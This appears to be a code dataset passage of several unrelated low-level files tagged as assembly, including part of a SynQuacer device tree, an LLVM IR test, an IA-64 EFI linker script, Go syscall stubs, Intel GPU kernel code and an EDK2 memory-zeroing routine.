cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU16: cpu@800 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x800>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU17: cpu@801 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x801>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU18: cpu@900 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x900>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU19: cpu@901 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0x901>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU20: cpu@a00 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0xa00>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU21: cpu@a01 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0xa01>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU22: cpu@b00 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0xb00>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
CPU23: cpu@b01 {
device_type = "cpu";
compatible = "arm,cortex-a53","arm,armv8";
reg = <0xb01>;
enable-method = "psci";
cpu-idle-states = <&CPU_SLEEP_0 &CLUSTER_SLEEP_0>;
};
cpu-map {
cluster0 {
core0 {
cpu = <&CPU0>;
};
core1 {
cpu = <&CPU1>;
};
};
cluster1 {
core0 {
cpu = <&CPU2>;
};
core1 {
cpu = <&CPU3>;
};
};
cluster2 {
core0 {
cpu = <&CPU4>;
};
core1 {
cpu = <&CPU5>;
};
};
cluster3 {
core0 {
cpu = <&CPU6>;
};
core1 {
cpu = <&CPU7>;
};
};
cluster4 {
core0 {
cpu = <&CPU8>;
};
core1 {
cpu = <&CPU9>;
};
};
cluster5 {
core0 {
cpu = <&CPU10>;
};
core1 {
cpu = <&CPU11>;
};
};
cluster6 {
core0 {
cpu = <&CPU12>;
};
core1 {
cpu = <&CPU13>;
};
};
cluster7 {
core0 {
cpu = <&CPU14>;
};
core1 {
cpu = <&CPU15>;
};
};
cluster8 {
core0 {
cpu = <&CPU16>;
};
core1 {
cpu = <&CPU17>;
};
};
cluster9 {
core0 {
cpu = <&CPU18>;
};
core1 {
cpu = <&CPU19>;
};
};
cluster10 {
core0 {
cpu = <&CPU20>;
};
core1 {
cpu = <&CPU21>;
};
};
cluster11 {
core0 {
cpu = <&CPU22>;
};
core1 {
cpu = <&CPU23>;
};
};
};
};
idle-states {
entry-method = "arm,psci";
CPU_SLEEP_0: cpu-sleep-0 {
compatible = "arm,idle-state";
arm,psci-suspend-param = <0x0010000>;
entry-latency-us = <300>;
exit-latency-us = <1200>;
min-residency-us = <2000>;
local-timer-stop;
};
CLUSTER_SLEEP_0: cluster-sleep-0 {
compatible = "arm,idle-state";
arm,psci-suspend-param = <0x1010000>;
entry-latency-us = <400>;
exit-latency-us = <1200>;
min-residency-us = <2500>;
local-timer-stop;
};
};
gic: interrupt-controller@30000000 {
compatible = "arm,gic-v3";
reg = <0x0 0x30000000 0x0 0x10000>, // GICD
<0x0 0x30400000 0x0 0x300000>, // GICR
<0x0 0x2c000000 0x0 0x2000>, // GICC
<0x0 0x2c010000 0x0 0x1000>, // GICH
<0x0 0x2c020000 0x0 0x10000>; // GICV
#interrupt-cells = <3>;
#address-cells = <2>;
#size-cells = <2>;
ranges;
interrupt-controller;
interrupts = <GIC_PPI 9 IRQ_TYPE_LEVEL_LOW>;
its: gic-its@30020000 {
compatible = "arm,gic-v3-its";
reg = <0x0 0x30020000 0x0 0x20000>;
#msi-cells = <1>;
msi-controller;
socionext,synquacer-pre-its = <0x58000000 0x200000>;
};
};
timer {
compatible = "arm,armv8-timer";
interrupts = <GIC_PPI 13 IRQ_TYPE_LEVEL_LOW>, // secure
<GIC_PPI 14 IRQ_TYPE_LEVEL_LOW>, // non-secure
<GIC_PPI 11 IRQ_TYPE_LEVEL_LOW>, // virtual
<GIC_PPI 10 IRQ_TYPE_LEVEL_LOW>; // HYP
};
mmio-timer@2a810000 {
compatible = "arm,armv7-timer-mem";
reg = <0x0 0x2a810000 0x0 0x10000>;
#address-cells = <2>;
#size-cells = <2>;
ranges;
frame@2a830000 {
frame-number = <0>;
interrupts = <GIC_SPI 60 IRQ_TYPE_LEVEL_HIGH>;
reg = <0x0 0x2a830000 0x0 0x10000>;
};
};
pmu {
compatible = "arm,cortex-a53-pmu";
interrupts = <GIC_PPI 7 IRQ_TYPE_LEVEL_LOW>;
};
psci {
compatible = "arm,psci-1.0";
method = "smc";
};
clk_uart: refclk62500khz {
compatible = "fixed-clock";
#clock-cells = <0>;
clock-frequency = <62500000>;
clock-output-names = "uartclk";
};
clk_apb: refclk100mhz {
compatible = "fixed-clock";
#clock-cells = <0>;
clock-frequency = <100000000>;
clock-output-names = "apb_pclk";
};
soc_uart0: uart@2a400000 {
compatible = "arm,pl011", "arm,primecell";
reg = <0x0 0x2a400000 0x0 0x1000>;
interrupts = <GIC_SPI 63 IRQ_TYPE_LEVEL_HIGH>;
clocks = <&clk_uart>, <&clk_apb>;
clock-names = "uartclk", "apb_pclk";
};
fuart: uart@51040000 {
compatible = "snps,dw-apb-uart";
reg = <0x0 0x51040000 0x0 0x1000>;
interrupts = <GIC_SPI 168 IRQ_TYPE_LEVEL_HIGH>;
clocks = <&clk_uart>, <&clk_apb>;
clock-names = "baudclk", "apb_pclk";
reg-io-width = <4>;
reg-shift = <2>;
};
clk_netsec: refclk250mhz {
compatible = "fixed-clock";
clock-frequency = <250000000>;
#clock-cells = <0>;
};
ethernet@522d0000 {
compatible = "socionext,synquacer-netsec";
reg = <0 0x522d0000 0x0 0x10000>,
<0 FixedPcdGet32 (PcdNetsecEepromBase) 0x0 0x10000>;
interrupts = <GIC_SPI 176 IRQ_TYPE_LEVEL_HIGH>;
clocks = <&clk_netsec>;
clock-names = "phy_ref_clk";
phy-mode = "rgmii";
max-speed = <1000>;
max-frame-size = <9000>;
phy-handle = <&phy_netsec>;
dma-coherent;
mdio_netsec: mdio {
#address-cells = <1>;
#size-cells = <0>;
};
};
smmu: iommu@582c0000 {
compatible = "arm,mmu-500", "arm,smmu-v2";
reg = <0x0 0x582c0000 0x0 0x10000>;
#global-interrupts = <1>;
interrupts = <GIC_SPI 202 IRQ_TYPE_LEVEL_HIGH>,
<GIC_SPI 202 IRQ_TYPE_LEVEL_HIGH>,
<GIC_SPI 202 IRQ_TYPE_LEVEL_HIGH>;
#iommu-cells = <1>;
status = "disabled";
};
pcie0: pcie@60000000 {
compatible = "socionext,synquacer-pcie-ecam", "snps,dw-pcie-ecam";
device_type = "pci";
reg = <0x0 0x60000000 0x0 0x7f00000>;
bus-range = <0x0 0x7e>;
#address-cells = <3>;
#size-cells = <2>;
ranges = <0x1000000 0x00 0x00000000 0x00 0x67f00000 0x0 0x00010000>,
<0x2000000 0x00 0x68000000 0x00 0x68000000 0x0 0x08000000>,
<0x3000000 0x3e 0x00000000 0x3e 0x00000000 0x1 0x00000000>;
#interrupt-cells = <0x1>;
interrupt-map-mask = <0x0 0x0 0x0 0x0>;
interrupt-map = <0x0 0x0 0x0 0x0 &gic 0x0 0x0 GIC_SPI 190 IRQ_TYPE_LEVEL_HIGH>;
msi-map = <0x000 &its 0x0 0x7f00>;
dma-coherent;
status = "disabled";
};
pcie1: pcie@70000000 {
compatible = "socionext,synquacer-pcie-ecam", "snps,dw-pcie-ecam";
device_type = "pci";
reg = <0x0 0x70000000 0x0 0x7f00000>;
bus-range = <0x0 0x7e>;
#address-cells = <3>;
#size-cells = <2>;
ranges = <0x1000000 0x00 0x00000000 0x00 0x77f00000 0x0 0x00010000>,
<0x2000000 0x00 0x78000000 0x00 0x78000000 0x0 0x08000000>,
<0x3000000 0x3f 0x00000000 0x3f 0x00000000 0x1 0x00000000>;
#interrupt-cells = <0x1>;
interrupt-map-mask = <0x0 0x0 0x0 0x0>;
interrupt-map = <0x0 0x0 0x0 0x0 &gic 0x0 0x0 GIC_SPI 182 IRQ_TYPE_LEVEL_HIGH>;
msi-map = <0x0 &its 0x10000 0x7f00>;
dma-coherent;
status = "disabled";
};
gpio: gpio@51000000 {
compatible = "socionext,synquacer-gpio", "fujitsu,mb86s70-gpio";
reg = <0x0 0x51000000 0x0 0x100>;
gpio-controller;
#gpio-cells = <2>;
clocks = <&clk_apb>;
base = <0>;
};
exiu: interrupt-controller@510c0000 {
compatible = "socionext,synquacer-exiu";
reg = <0x0 0x510c0000 0x0 0x20>;
interrupt-controller;
interrupt-parent = <&gic>;
#interrupt-cells = <3>;
socionext,spi-base = <112>;
};
clk_alw_b_0: bclk200 {
compatible = "fixed-clock";
#clock-cells = <0>;
clock-frequency = <200000000>;
clock-output-names = "sd_bclk";
};
clk_alw_c_0: sd4clk800 {
compatible = "fixed-clock";
#clock-cells = <0>;
clock-frequency = <800000000>;
clock-output-names = "sd_sd4clk";
};
sdhci: sdhci@52300000 {
compatible = "socionext,synquacer-sdhci", "fujitsu,mb86s70-sdhci-3.0";
reg = <0 0x52300000 0x0 0x1000>;
interrupts = <GIC_SPI 152 IRQ_TYPE_LEVEL_HIGH>,
<GIC_SPI 153 IRQ_TYPE_LEVEL_HIGH>;
bus-width = <8>;
cap-mmc-highspeed;
fujitsu,cmd-dat-delay-select;
clocks = <&clk_alw_c_0 &clk_alw_b_0>;
clock-names = "core", "iface";
dma-coherent;
status = "disabled";
};
clk_alw_1_8: spi_ihclk {
compatible = "fixed-clock";
#clock-cells = <0>;
clock-frequency = <125000000>;
clock-output-names = "iHCLK";
};
spi: spi@54810000 {
compatible = "socionext,synquacer-spi";
reg = <0x0 0x54810000 0x0 0x1000>;
interrupts = <GIC_SPI 160 IRQ_TYPE_LEVEL_HIGH>,
<GIC_SPI 161 IRQ_TYPE_LEVEL_HIGH>,
<GIC_SPI 162 IRQ_TYPE_LEVEL_HIGH>;
clocks = <&clk_alw_1_8>;
clock-names = "iHCLK";
socionext,use-rtm;
socionext,set-aces;
#address-cells = <1>;
#size-cells = <0>;
status = "disabled";
};
clk_i2c: i2c_pclk {
compatible = "fixed-clock";
#clock-cells = <0>;
clock-frequency = <62500000>;
clock-output-names = "pclk";
};
i2c: i2c@51210000 {
compatible = "socionext,synquacer-i2c";
reg = <0x0 0x51210000 0x0 0x1000>;
interrupts = <GIC_SPI 165 IRQ_TYPE_LEVEL_HIGH>;
clocks = <&clk_i2c>;
clock-names = "pclk";
clock-frequency = <400000>;
#address-cells = <1>;
#size-cells = <0>;
};
tpm: tpm_tis@10000000 {
compatible = "socionext,synquacer-tpm-mmio";
reg = <0x0 0x10000000 0x0 0x5000>;
status = "disabled";
};
firmware {
optee {
compatible = "linaro,optee-tz";
method = "smc";
status = "disabled";
};
};
};
#include "SynQuacerCaches.dtsi"
| {
"language": "Assembly"
} |
; RUN: opt -gvn-hoist %s -S -o - | FileCheck %s
; CHECK: store
; CHECK-NOT: store
target datalayout = "e-m:e-p:32:32-i64:64-v128:64:128-a:0:32-n32-S64"
define void @f(i8* %p) {
entry:
switch i4 undef, label %if.then30 [
i4 4, label %if.end
i4 0, label %if.end
]
if.end:
br label %if.end19
if.end19:
br i1 undef, label %e, label %e.thread
e.thread:
store i8 0, i8* %p, align 4
br label %if.then30
if.then30:
call void @g()
unreachable
e:
store i8 0, i8* %p, align 4
unreachable
}
declare void @g()
| {
"language": "Assembly"
} |
OUTPUT_FORMAT("elf64-ia64-little")
OUTPUT_ARCH(ia64)
ENTRY(_start_plabel)
SECTIONS
{
. = 0;
ImageBase = .;
.hash : { *(.hash) } /* this MUST come first! */
. = ALIGN(4096);
.text :
{
_text = .;
*(.text)
*(.text.*)
*(.gnu.linkonce.t.*)
_etext = .;
}
. = ALIGN(4096);
__gp = ALIGN (8) + 0x200000;
.sdata :
{
_data = .;
*(.got.plt)
*(.got)
*(.srodata)
*(.sdata)
*(.sbss)
*(.scommon)
}
. = ALIGN(4096);
.note.gnu.build-id : {
*(.note.gnu.build-id)
}
.data.ident : {
*(.data.ident)
}
. = ALIGN(4096);
.data :
{
*(.rodata*)
*(.ctors)
*(.data*)
*(.gnu.linkonce.d*)
*(.plabel) /* data whose relocs we want to ignore */
. = ALIGN(16);
_init_array = .;
*(SORT_BY_NAME(.init_array))
_init_array_end = .;
__CTOR_LIST__ = .;
*(SORT_BY_NAME(.ctors))
__CTOR_END__ = .;
__DTOR_LIST__ = .;
*(SORT_BY_NAME(.dtors))
__DTOR_END__ = .;
_fini_array = .;
*(SORT_BY_NAME(.fini_array))
_fini_array_end = .;
/* the EFI loader doesn't seem to like a .bss section, so we stick
it all into .data: */
*(.dynbss)
*(.bss)
*(COMMON)
}
. = ALIGN(4096);
.vendor_cert :
{
*(.vendor_cert)
}
. = ALIGN(4096);
.dynamic : { *(.dynamic) }
. = ALIGN(4096);
.rela :
{
*(.rela.text)
*(.rela.data*)
*(.rela.sdata)
*(.rela.got)
*(.rela.gnu.linkonce.d*)
*(.rela.stab)
*(.rela.ctors)
*(.rela.init_array)
}
_edata = .;
_data_size = . - _data;
. = ALIGN(4096);
.reloc : /* This is the PECOFF .reloc section! */
{
*(.reloc)
}
. = ALIGN(4096);
.dynsym : { *(.dynsym) }
. = ALIGN(4096);
.dynstr : { *(.dynstr) }
/DISCARD/ :
{
*(.rela.plabel)
*(.rela.reloc)
*(.IA_64.unwind*)
*(.IA64.unwind*)
}
.note.gnu.build-id : { *(.note.gnu.build-id) }
}
| {
"language": "Assembly"
} |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System call support for AMD64, Darwin
//
// Just jump to package syscall's implementation for all these functions.
// The runtime may know about them.
TEXT ·Syscall(SB),NOSPLIT,$0-56
JMP syscall·Syscall(SB)
TEXT ·Syscall6(SB),NOSPLIT,$0-80
JMP syscall·Syscall6(SB)
TEXT ·Syscall9(SB),NOSPLIT,$0-104
JMP syscall·Syscall9(SB)
TEXT ·RawSyscall(SB),NOSPLIT,$0-56
JMP syscall·RawSyscall(SB)
TEXT ·RawSyscall6(SB),NOSPLIT,$0-80
JMP syscall·RawSyscall6(SB)
| {
"language": "Assembly"
} |
/*
* Copyright (c) 2017, Intel Corporation
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
* OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
* ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
* OTHER DEALINGS IN THE SOFTWARE.
*/
L0:
mov (1|M0) r22.4<1>:ud 0x1000100:ud
mov (4|M0) acc0.0<1>:w 0x2406:v
add (4|M0) acc0.0<1>:w acc0.0<4;4,1>:w 0x40:uw
shl (4|M0) r22.0<1>:w acc0.0<4;4,1>:w 0x5:uw
(W&~f0.1)jmpi L800
L80:
mov (8|M0) r16.0<1>:ud r0.0<8;8,1>:ud
mov (8|M0) r17.0<1>:ud r25.0<8;8,1>:ud
mov (1|M0) r16.2<1>:ud 0xE000:ud
cmp (1|M0) (eq)f1.0 null.0<1>:w r24.2<0;1,0>:ub 0x1:uw
mov (16|M0) r66.0<1>:uw 0xFFFF:uw
mov (16|M0) r67.0<1>:uw 0xFFFF:uw
mov (16|M0) r74.0<1>:uw 0xFFFF:uw
mov (16|M0) r75.0<1>:uw 0xFFFF:uw
add (1|M0) a0.0<1>:ud r23.5<0;1,0>:ud 0x42EC100:ud
(~f1.0) mov (1|M0) r17.2<1>:f r10.2<0;1,0>:f
(~f1.0) mov (1|M0) r17.3<1>:f r10.7<0;1,0>:f
(f1.0) mov (1|M0) r17.2<1>:f r10.0<0;1,0>:f
(f1.0) mov (1|M0) r17.3<1>:f r10.7<0;1,0>:f
send (1|M0) r64:uw r16:ub 0x2 a0.0
(~f1.0) mov (1|M0) r17.2<1>:f r10.2<0;1,0>:f
(~f1.0) mov (1|M0) r17.3<1>:f r10.4<0;1,0>:f
(f1.0) mov (1|M0) r17.2<1>:f r10.0<0;1,0>:f
(f1.0) mov (1|M0) r17.3<1>:f r10.4<0;1,0>:f
send (1|M0) r72:uw r16:ub 0x2 a0.0
add (1|M0) a0.0<1>:ud r23.5<0;1,0>:ud 0x42EC201:ud
(~f1.0) mov (1|M0) r17.2<1>:f r10.2<0;1,0>:f
(~f1.0) mov (1|M0) r17.3<1>:f r10.7<0;1,0>:f
(f1.0) mov (1|M0) r17.2<1>:f r10.0<0;1,0>:f
(f1.0) mov (1|M0) r17.3<1>:f r10.7<0;1,0>:f
send (1|M0) r68:uw r16:ub 0x2 a0.0
(~f1.0) mov (1|M0) r17.2<1>:f r10.2<0;1,0>:f
(~f1.0) mov (1|M0) r17.3<1>:f r10.4<0;1,0>:f
(f1.0) mov (1|M0) r17.2<1>:f r10.0<0;1,0>:f
(f1.0) mov (1|M0) r17.3<1>:f r10.4<0;1,0>:f
send (1|M0) r76:uw r16:ub 0x2 a0.0
add (1|M0) a0.0<1>:ud r23.5<0;1,0>:ud 0x42EC302:ud
(~f1.0) mov (1|M0) r17.2<1>:f r10.2<0;1,0>:f
(~f1.0) mov (1|M0) r17.3<1>:f r10.7<0;1,0>:f
(f1.0) mov (1|M0) r17.2<1>:f r10.0<0;1,0>:f
(f1.0) mov (1|M0) r17.3<1>:f r10.7<0;1,0>:f
send (1|M0) r70:uw r16:ub 0x2 a0.0
(~f1.0) mov (1|M0) r17.2<1>:f r10.2<0;1,0>:f
(~f1.0) mov (1|M0) r17.3<1>:f r10.4<0;1,0>:f
(f1.0) mov (1|M0) r17.2<1>:f r10.0<0;1,0>:f
(f1.0) mov (1|M0) r17.3<1>:f r10.4<0;1,0>:f
send (1|M0) r78:uw r16:ub 0x2 a0.0
mov (1|M0) a0.8<1>:uw 0x800:uw
mov (1|M0) a0.9<1>:uw 0x880:uw
mov (1|M0) a0.10<1>:uw 0x8C0:uw
add (4|M0) a0.12<1>:uw a0.8<4;4,1>:uw 0x100:uw
L800:
nop
| {
"language": "Assembly"
} |
#------------------------------------------------------------------------------
#
# Copyright (c) 2006 - 2008, Intel Corporation. All rights reserved.<BR>
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php.
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
# Module Name:
#
# ZeroMem.S
#
# Abstract:
#
# ZeroMem function
#
# Notes:
#
#------------------------------------------------------------------------------
ASM_GLOBAL ASM_PFX(InternalMemZeroMem)
#------------------------------------------------------------------------------
# VOID *
# InternalMemZeroMem (
# IN VOID *Buffer,
# IN UINTN Count
# );
#------------------------------------------------------------------------------
ASM_PFX(InternalMemZeroMem):
push %edi
xorl %eax,%eax
movl 8(%esp),%edi
movl 12(%esp),%ecx
movl %ecx,%edx
shrl $2,%ecx
andl $3,%edx
pushl %edi
rep
stosl
movl %edx,%ecx
rep
stosb
popl %eax
pop %edi
ret
| {
"language": "Assembly"
} |
// Copyright 2015 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build linux
// +build arm64
// +build !gccgo
#include "textflag.h"
// Just jump to package syscall's implementation for all these functions.
// The runtime may know about them.
TEXT ·Syscall(SB),NOSPLIT,$0-56
B syscall·Syscall(SB)
TEXT ·Syscall6(SB),NOSPLIT,$0-80
B syscall·Syscall6(SB)
TEXT ·SyscallNoError(SB),NOSPLIT,$0-48
BL runtime·entersyscall(SB)
MOVD a1+8(FP), R0
MOVD a2+16(FP), R1
MOVD a3+24(FP), R2
MOVD $0, R3
MOVD $0, R4
MOVD $0, R5
MOVD trap+0(FP), R8 // syscall entry
SVC
MOVD R0, r1+32(FP) // r1
MOVD R1, r2+40(FP) // r2
BL runtime·exitsyscall(SB)
RET
TEXT ·RawSyscall(SB),NOSPLIT,$0-56
B syscall·RawSyscall(SB)
TEXT ·RawSyscall6(SB),NOSPLIT,$0-80
B syscall·RawSyscall6(SB)
TEXT ·RawSyscallNoError(SB),NOSPLIT,$0-48
MOVD a1+8(FP), R0
MOVD a2+16(FP), R1
MOVD a3+24(FP), R2
MOVD $0, R3
MOVD $0, R4
MOVD $0, R5
MOVD trap+0(FP), R8 // syscall entry
SVC
MOVD R0, r1+32(FP)
MOVD R1, r2+40(FP)
RET
| {
"language": "Assembly"
} |